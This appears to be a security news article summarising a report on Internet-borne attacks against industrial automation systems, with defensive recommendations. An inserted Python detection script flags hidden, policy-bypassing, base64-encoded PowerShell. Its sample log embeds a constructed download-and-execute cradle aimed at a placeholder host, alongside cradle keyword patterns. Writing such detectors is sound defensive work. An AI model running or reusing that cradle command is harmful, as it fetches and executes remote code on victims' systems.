Monday, December 8, 2025

Internet Identified As Leading Cyber Threat To Industrial Automation Systems, New Report Reveals

New findings from a leading cybersecurity firm’s Q1 2025 report have spotlighted a critical shift in the threat landscape facing Industrial Automation Systems (IAS).

The Internet, once a secondary attack vector, has now emerged as the primary source of malicious activity targeting industrial control infrastructures worldwide.

The gravity of this development is hard to overstate. Industrial systems, from factories and power plants to water treatment facilities and transportation hubs, form the backbone of modern society.

Their operation is increasingly dependent on connectivity for data flow, efficiency, and remote management.

However, this very connectivity is now being exploited by cyber attackers, exposing industrial processes to a breadth of sophisticated threats.

The report reveals that in Q1 2025, 21.9 percent of all ICS computers globally encountered at least one blocked Internet-based threat, with this figure climbing to nearly 30 percent in certain regions such as Africa and Southeast Asia.

The Internet-based attacks analyzed include connections to denylisted resources for command-and-control activities, malicious scripts, phishing pages, web-based cryptocurrency miners, and spyware.

Modern attackers utilize a mix of techniques, from fileless attacks leveraging PowerShell to the exploitation of browser vulnerabilities and more traditional phishing campaigns.

A key technical takeaway is that significant numbers of IAS assets are directly or indirectly exposed to the Internet via improper network segmentation, poorly configured firewalls, or a lack of application whitelisting.

Many industrial facilities are still running outdated software and operating systems, further compounding the risk.

Attackers are increasingly relying on fileless malware, often executed through legitimate tools like PowerShell.

This method allows malware to run in memory rather than leaving traces on disk, which makes detection by traditional antivirus products much more difficult.

For instance, a typical malicious PowerShell command uses WindowStyle Hidden and ExecutionPolicy Bypass flags with base64-encoded payloads to covertly launch crypto-miners or download additional malicious scripts.

Similarly, attackers abuse legitimate open-source mining software like XMRig or NBMiner to hijack computing resources in industrial environments, draining system capacity and creating overheating or performance instability.

  • These attacks are complemented by phishing and malicious scripts distributed through seemingly innocent websites.
  • These scripts are designed to harvest operator credentials, redirect users to drive-by download sites, or trigger further infections like ransomware or industrial-specific malware strains.

The technical sophistication is matched by the attackers’ persistence, with some campaigns tailored to blend in with typical network traffic to avoid detection.

Regional disparities in attack prevalence are striking. Africa leads the statistical chart, where nearly 30 percent of ICS endpoints reported Internet-borne threats, while Southeast Asia shows similar vulnerability rates.

These regions also report relatively high exposure to viruses and specialized industrial malware, including threats manipulating AutoCAD files critical for industrial design and operations.

Experts attribute this heightened risk to factors such as underinvestment in advanced cybersecurity tools, inadequate network segmentation between IT and OT environments, and low levels of cybersecurity awareness among operational staff.

In practice, a standard attack chain may begin with a phishing email or malicious URL, leading to an initial compromise via social engineering or malicious scripting.

Once access is gained, attackers deploy fileless malware or crypto-miners, often moving laterally within the network by harvesting credentials and targeting key ICS servers or SCADA management interfaces.

Persistent attackers may use stolen credentials to establish a foothold, exfiltrate data, or initiate disruptive attacks such as ransomware, demanding payment to restore crucial industrial operations.

Given the technical depth and evolving nature of the Internet threat landscape, several core defensive strategies are outlined.

Network segmentation must be rigorously enforced to separate corporate IT and critical OT environments, ensuring that industrial systems are not directly accessible from the broader Internet.

Organizations should deploy updated whitelisting and denylisting rules on all industrial firewalls and proxies, restrict unnecessary Internet access through strict application-layer controls, and monitor scripting activity on endpoints for anomalies.
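As an added example (not from the report or this article), the following Python triages process-creation log lines for the PowerShell pattern described earlier (hidden window, bypassed execution policy, base64-encoded payload) and decodes the payload to check for download-cradle keywords, which is one way to monitor scripting activity on endpoints. The log format, host names, user names and the URL are assumptions, and the sample lines are constructed.

```python
import base64
import re

# Indicators from the article (hidden window, bypassed execution policy, base64 payload); aliases such as -w/-ep/-enc are covered too.
FLAG_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I),
}
# Keywords showing that a decoded payload fetches and runs remote content.
CRADLE_KEYWORDS = ("downloadstring", "downloadfile", "invoke-webrequest", "invoke-expression", "iex", "net.webclient")

def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if it does not parse."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmd):
    """List the indicators found in one process command line (empty for non-PowerShell)."""
    indicators = []
    if "powershell" not in cmd.lower():
        return indicators
    for name, pattern in FLAG_PATTERNS.items():
        match = pattern.search(cmd)
        if not match:
            continue
        indicators.append(name)
        if name == "encoded_command":
            decoded = (decode_encoded_command(match.group(1)) or "").lower()
            if any(keyword in decoded for keyword in CRADLE_KEYWORDS):
                indicators.append("download_cradle")
    return indicators

def encode_ps(script):
    """Build an -EncodedCommand value; used here only to construct the sample log."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLE_LOGS = [  # constructed log lines, not real telemetry; the URL is a placeholder
    'host=eng-ws01 user=operator cmd="powershell.exe -NoProfile -Command Get-Date"',
    'host=hmi-02 user=svc_hist cmd="powershell.exe -w hidden -ep bypass -enc '
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')") + '"',
    'host=plc-gw user=admin cmd="notepad.exe C:\\temp\\notes.txt"',
]

def triage(lines):
    """Return (host field, indicators) for every log line that carries an indicator."""
    pairs = [(line.split()[0], re.search(r'cmd="([^"]*)"', line)) for line in lines]
    return [(host, ind) for host, m in pairs if m and (ind := analyze_command_line(m.group(1)))]
```

Running `triage(SAMPLE_LOGS)` flags only the hmi-02 line, with all four indicators; the benign PowerShell invocation on eng-ws01 produces none, which is the distinction an alert rule needs to make.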

Security awareness training remains vital, equipping operators and engineers with the skills to spot phishing and practice safe Internet habits.

Routine patching of ICS devices and underlying software should not be neglected.

In summary, the Internet now stands as the primary threat source for industrial automation environments, bringing with it complex attack techniques and rising risks.

As digital transformation accelerates and connectivity deepens, the need for layered, proactive cybersecurity defenses grows more urgent.

The report’s findings serve as a stark warning: defenders in critical infrastructure must prioritize Internet-borne threats to prevent future disruptions and safeguard essential industrial processes.

Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.
